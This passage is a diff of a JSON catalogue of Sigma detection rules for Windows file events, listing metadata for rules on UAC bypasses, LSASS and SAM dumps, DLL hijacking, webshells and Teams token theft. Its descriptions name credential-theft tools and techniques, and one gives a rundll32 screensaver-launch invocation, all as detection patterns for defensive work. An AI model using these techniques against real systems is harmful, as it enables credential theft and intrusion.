"7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "value": "UAC Bypass Using NTFS Reparse Point - File" + "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", @@ -24846,20 +26396,70 @@ "value": "UAC Bypass Abusing Winsat Path Parsing - File" }, { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects a dump file written by QuarksPwDump password dumper", "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", + "author": "Florian Roth", + "creation_date": "2018/02/10", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_wmp.yml", + "filename": "file_event_win_quarkspw_filedump.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File" + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/10/25", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "file_event_win_mal_vhd_download.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense_evasion", @@ -24867,57 +26467,354 @@ "attack.t1548.002" ] }, - "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", - "value": "UAC Bypass Using Windows Media Player - File" + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File" }, { - "description": "Possible webshell file creation on a static web site", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Beyu Denis, oscd.community, Tim Shelton", - "creation_date": "2019/10/22", + "author": "frack113", + "creation_date": "2022/02/13", "falsepositive": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Legitimate use" ], - "filename": "file_event_win_webshell_creation_detect.yml", - "level": "high", + "filename": "file_event_win_screenconnect_artefact.yml", + "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "PT ESC rule and personal experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.command_and_control", + "attack.t1219" ] }, - "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "value": "Windows Webshell Creation" + "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", + "value": "ScreenConnect Temporary Installation Artefact" }, { - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", "meta": { - "author": "frack113", - "creation_date": "2022/05/09", + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_werfault_dll_hijacking.yml", + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ] + }, + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking" + }, + { + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "meta": { + "author": "frack113", + "creation_date": "2022/01/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_colorcpl.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + "https://twitter.com/eral4m/status/1480468728324231172?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "value": "Suspicious Creation with Colorcpl" + }, + { + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_tsclient_filewrite_startup.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", + "value": "Hijack Legit RDP Session to Move Laterally" + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins" + }, + { + "description": "Detects windows executables that writes files with suspicious extensions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_files_extensions.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" + ], + "tags": "No established tags" + }, + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions" + }, + { + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation" + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "filename": "file_event_win_iso_file_recent.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No established tags" + }, + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files" + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ] + }, + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE" + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "meta": { + "author": "Vadim Varganov, Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_msdt_autorun.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" ], "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1547.001", + "cve.2022.30190" ] }, - "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "value": "Creation of an WerFault.exe in Unusual Folder" + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory" + }, + { + "description": "Detects the creation of an executable by another executable", + "meta": { + "author": "frack113", + "creation_date": "2022/03/09", + "falsepositive": [ + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" + ], + "filename": "file_event_win_susp_dropper.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware Sandbox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "297afac9-5d02-4138-8c58-b977bac60556", + "value": "Creation of an Executable by an Executable" + }, + { + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Rare legitimate usage of some of the extensions mentioned in the rule" + ], + "filename": "file_event_win_susp_startup_folder_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "value": "Suspicious Startup Folder Persistence" + }, + { + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2019/03/24", + "falsepositive": [ + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + ], + "filename": "file_event_win_susp_adsi_cache_usage.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://github.com/fox-it/LDAPFragger", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "value": "Suspicious ADSI-Cache Usage By Unknown Tool" + }, + { + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "meta": { + "author": "@sam0x90", + "creation_date": "2022/07/30", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "filename": "file_event_win_iso_file_mount.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", @@ -24944,53 +26841,255 @@ "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, { - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", "meta": { - "author": "Florian Roth, Sittikorn S", - "creation_date": "2021/09/10", + "author": "frack113", + "creation_date": "2021/12/29", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_winword_cve_2021_40444.yml", + "filename": "file_event_win_creation_new_shim_database.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory" + }, + { + "description": "Possible webshell file creation on a static web site", + "meta": { + "author": "Beyu Denis, oscd.community, Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "filename": "file_event_win_webshell_creation_detect.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" ], "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1505.003" ] }, - "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "value": "Suspicious Word Cab File Write CVE-2021-40444" + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation" }, { - "description": "Detects the creation of the default output filename used by the wmicexec tool", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/02", + "author": "frack113", + "creation_date": "2022/04/23", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "file_event_win_wmiexec_default_filename.yml", - "level": "critical", + "filename": "file_event_win_susp_get_variable.yml", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + "https://www.joesandbox.com/analysis/465533/0/html", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "value": "Suspicious Get-Variable.exe Creation" + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_werfault_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_teams.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects" + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_writing_local_admin_share.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" ], "tags": [ "attack.lateral_movement", - "attack.t1047" + "attack.t1546.002" ] }, - "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "value": "Wmiexec Default Output File" + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share" + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/04/27", + "falsepositive": [ + "The installation of new screen savers." + ], + "filename": "file_event_win_new_src_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event" + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_crackmapexec_patterns.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns" + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive" + }, + { + "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_create_non_existent_dlls.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", @@ -25019,103 +27118,178 @@ "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, { - "description": "Detects file writes of WMI script event consumer", + "description": "Detects programs on a Windows system that should not write scripts to disk", "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", - "falsepositive": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" - ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ] - }, - "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", - "value": "WMI Persistence - Script Event Consumer File Write" - }, - { - "description": "Detects creation of template files for Microsoft Office from outside Office", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/06/02", - "falsepositive": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" - ], - "filename": "file_event_win_word_template_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", - "value": "Office Template Creation" - }, - { - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/18", - "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" - ], - "filename": "file_event_win_wpbbin_persistence.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ] - }, - "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "value": "UEFI Persistence Via Wpbbin - FileCreation" - }, - { - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_writing_local_admin_share.yml", + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script" + }, + { + "description": "Detects the creation of an file in user Word Startup", + "meta": { + "author": "frack113", + "creation_date": "2022/06/05", + "falsepositive": [ + "Addition of legitimate plugins" + ], + "filename": "file_event_win_susp_winword_startup.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + 